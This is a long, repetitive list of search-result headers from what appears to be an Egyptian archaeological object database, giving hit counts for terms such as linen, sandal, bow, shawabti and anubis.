Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for ring - (hits/occ.: 86)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 14)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for fruit - (hits/occ.: 9)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 14)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for fruit - (hits/occ.: 9)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for food - (hits/occ.: 49)Results List for de - (hits/occ.: 418)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for shawabti - (hits/occ.: 285)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for loin - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 14)Results List for fruit - (hits/occ.: 9)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for glass - (hits/occ.: 28)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for fruit - (hits/occ.: 9)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for anubis - (hits/occ.: 5)Results List for glass - (hits/occ.: 28)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 14)Results List for glass - (hits/occ.: 28)Results List for shield - (hits/occ.: 8)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for fruit - (hits/occ.: 9)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 14)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for fruit - (hits/occ.: 9)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for anubis - (hits/occ.: 5)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for glove - (hits/occ.: 10)Results List for mask - 